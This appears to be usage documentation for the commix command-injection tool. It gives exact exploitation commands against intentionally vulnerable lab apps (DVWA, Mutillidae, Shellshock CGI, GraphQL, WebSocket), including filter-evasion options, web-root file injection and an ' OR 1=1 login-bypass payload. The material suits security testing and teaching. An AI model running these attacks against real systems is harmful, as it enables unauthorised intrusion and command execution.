Commix offers comprehensive support for command injection exploitation across a wide range of backend technologies and web application environments. Its flexible payload generation and injection techniques enable it to target diverse server-side languages and frameworks, including but not limited to the most commonly used ones.

This broad compatibility allows penetration testers and security researchers to assess and exploit command injection vulnerabilities in applications developed with various programming languages and platforms, ensuring thorough and effective testing coverage.

• PHP - Classic and advanced injection scenarios in PHP applications, including cookie, header, and POST parameters.
• Python - Injection in Python-powered web services, including Flask, Django, and custom APIs.
• Perl - CGI and other Perl-based web services vulnerable to command injection.
• Ruby - Exploitation of Ruby web apps or services with injection points.
• CGI - Classic Common Gateway Interface scripts (any language) vulnerable to shell injection.
• GCH - Generic command handler-based injection points.
• ASP.NET (Experimental) - Emerging support for command injection in ASP.NET applications.
• JSP (Experimental) - Experimental handling of Java Server Pages environments.

This document presents a curated collection of commix usage examples targeting various intentionally vulnerable applications.

Each example includes:

• A short explanation of the technique or scenario.
• The vulnerable target endpoint or parameter.
• The exact command used to exploit the vulnerability.

Description:
Command injection vulnerability in vulnerabilities/exec/. DVWA offers multiple security levels, and each alters input sanitization behavior.

Below are examples of exploiting each level:

Low security: Application applies minimal input checks, making it highly susceptible to straightforward command injection. Commix can exploit such targets easily using default payloads without the need for advanced evasion techniques.

Usage example:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \
--data="ip=127.0.0.1&Submit=submit" \
--cookie="security=low; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Medium security: Application introduces basic input validation to block obvious command injection attempts. Commix automatically adapts to these slightly hardened filters by applying encoding, separator manipulation, and evasion techniques to successfully inject and execute commands.

Usage example:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \
--data="ip=127.0.0.1&Submit=submit" \
--cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

High security: Application introduces advanced input validation to block obvious command injection attempts. Commix can bypass advanced input sanitization and output filtering by using file-based injection techniques (--technique=F) in combination with a user-specified web root path (--web-root).

Usage example:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" \
--data="ip=127.0.0.1&Submit=submit" \
--cookie="security=high; PHPSESSID=nq30op434117mo7o2oe5bl7is4" \
--technique=f \
--web-root="/var/www/html/"

Description:
GET-based parameter injection with custom prefix / suffix. This example demonstrates injection via a vulnerable type parameter using custom payload encapsulation to bypass basic filtering.

Usage example:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" \
--prefix="'" \
--suffix="//"

Description:
POST parameter in DNS lookup feature, with custom headers and proxy. This example uses commix to inject via target_host while supplying additional headers and routing traffic through a proxy (e.g., Burp Suite).

Usage example:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" \
--data="target_host=127.0.0.1" \
--headers="Accept-Language:fr\nETag:123\n" \
--proxy="127.0.0.1:8081"

Description:
Command injection in debug.php, using alternative shell. Commix supports alternative shell types for stable exploitation; here, Python is used for environments where bash or sh are not suitable.

Usage example:

python commix.py --url="http://192.168.178.8/debug.php" \
--data="addr=127.0.0.1" \
--alter-shell="Python"

Description:
Command injection in address parameter via NodeJS endpoint. This POST-based injection targets Node.js backends that may pass input directly to shell commands.

Usage example:

python commix.py --url="http://127.0.0.1:9090/app/ping" \
--data "address=127.0.0.1" \
--cookie="connect.sid=s%3AIdvte5ieuGQC5C8jt5aSyUTSF8xZtls8.3fwCVsyypx%2BLGXtiF1JTBrqbmjp%2B29vwKoL0uxcHub8"

Description:
POST injection after authentication bypass. This command demonstrates how commix can handle session-based injections, including logging in via --auth-url before attacking.

Usage example:

python commix.py --url="http://192.168.178.2/pingit.php" \
--data="ip=127.0.0.1E&submit=submit" \
--auth-url="http://192.168.178.2/index.php" \
--auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

Description:
GET injection with custom User-Agent and specific technique. This command uses a forged User-Agent header and a specific technique (--technique="f") against drawimage.php.

Usage example:

python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" \
--user-agent="Mozilla/4.0 Mozilla4_browser" \
--technique="f" \
--web-root="/"

Description:
Shellshock-vulnerable CGI endpoint

Commix can directly exploit Bash environment variable injection vulnerabilities (commonly known as Shellshock) using the --shellshock option. This allows detection and exploitation of affected targets by injecting payloads through vulnerable HTTP headers or parameters that influence Bash environment variables.

Usage example:

python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

Description:
Commix supports exploiting command injection vulnerabilities through Cookie parameters. This example focuses on the addr cookie value for injection.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/cookie/cookie(classic).php" \
--level=2 \
--cookie="addr=127.0.0.1"

Description:
This example demonstrates exploiting a classic injection vulnerability in the User-Agent header by specifying the injection point with the -p user-agent flag. The --level=3 option increases the number of tests and payloads to improve detection accuracy.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/user-agent/ua(classic).php" \
--level=3 \
-p user-agent

Description:
This example demonstrates exploiting a classic injection vulnerability in the Referer header by specifying the injection point with the -p referer flag. The --level=3 option increases the number of tests and payloads to improve detection accuracy.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/referer/referer(classic).php" \
--level=3 \
-p referer

Description:
Commix supports injecting payloads into custom HTTP headers, including authentication headers, with optional Base64 encoding. This is especially useful when testing APIs or services that require token-based authentication and expect Base64-encoded data in headers.

Usage example:

python commix.py --url="https://192.168.2.12/do/cmd/*" \
--headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" \
--base64

Description:
Commix automatically detects JSON content in the request body and targets specified fields for injection. In this example, the addr field within the JSON payload is modified to exploit command injection vulnerabilities.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_json.php" \
--data='{"addr":"127.0.0.1","name":"ancst"}'

Description:
Commix supports detecting and exploiting command injection vulnerabilities within GraphQL mutations and queries by injecting payloads into parameters embedded in the GraphQL request body.

In following both cases, commix parses the JSON payload and injects malicious commands into the specified GraphQL parameters to test and exploit command injection flaws.

1. ImportPaste Mutation Injection: Example of exploiting injection via a GraphQL mutation.

Usage example:

python commix.py --url="http://127.0.0.1:5000/graphql" \
--data='{"query":"mutation{importPaste(host:\"commixproject.com\" , port:80 , path:\"/\" , scheme:\"http\"){result}}"}'

2. systemDiagnostics Query Injection: Example of targeting a vulnerable GraphQL query, injecting into the cmd parameter.

Usage example:

python commix.py --url="http://127.0.0.1:5000/graphql" \
--data='{"query":"query {systemDiagnostics(username:\"admin\" , password:\"admin123\" , cmd:\"test\")}"}' \
-p cmd

Description:
Commix supports injecting payloads into XML data sent in the request body. This example targets the addr element within the XML structure, which is vulnerable to command injection.

Usage example:

python commix.py --url="http://127.0.0.1/scenarios/regular/POST/classic_xml.php" \
--data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>127.0.0.1</addr><count>4</count></ping>'

Description:
Commix can exploit command injection vulnerabilities in backends accessible only through WebSocket proxies. This method enables testing and exploitation in scenarios where direct HTTP access to the backend is unavailable, but traffic is proxied via WebSocket connections. By bridging traditional HTTP injection techniques with WebSocket communication, commix broadens the attack surface for modern web applications.

This setup requires an HTTP-to-WebSocket proxy that forwards HTTP requests to the WebSocket application, facilitating seamless injection testing over WebSocket protocols.

1. Run the HTTP2WebSocket listener on port 3333 to proxy requests to the WebSocket app at ws://dvws.local:8080:

Usage example:

python HTTP2WebSocket.py -l 3333 -t ws://dvws.local:8080

2. Once the HTTP-to-WebSocket proxy is established and listening on the specified port, commix sends its injection payloads to the proxied HTTP endpoint. By modifying parameters such as addr in the POST data, commix leverages the proxy to interact with the WebSocket-connected backend, triggering command injection vulnerabilities.

Usage example:

python commix.py --url="http://127.0.0.1:3333/command-execution" \
--data="addr=127.0.0.1"